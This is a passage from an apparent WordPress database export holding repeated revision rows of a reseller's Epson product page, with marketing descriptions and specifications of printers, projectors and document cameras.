/></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:34:58','2019-09-25 09:34:58','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3477,1,'2019-09-25 17:35:31','2019-09-25 09:35:31','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:35:31','2019-09-25 09:35:31','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3478,1,'2019-09-25 17:36:02','2019-09-25 09:36:02','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson 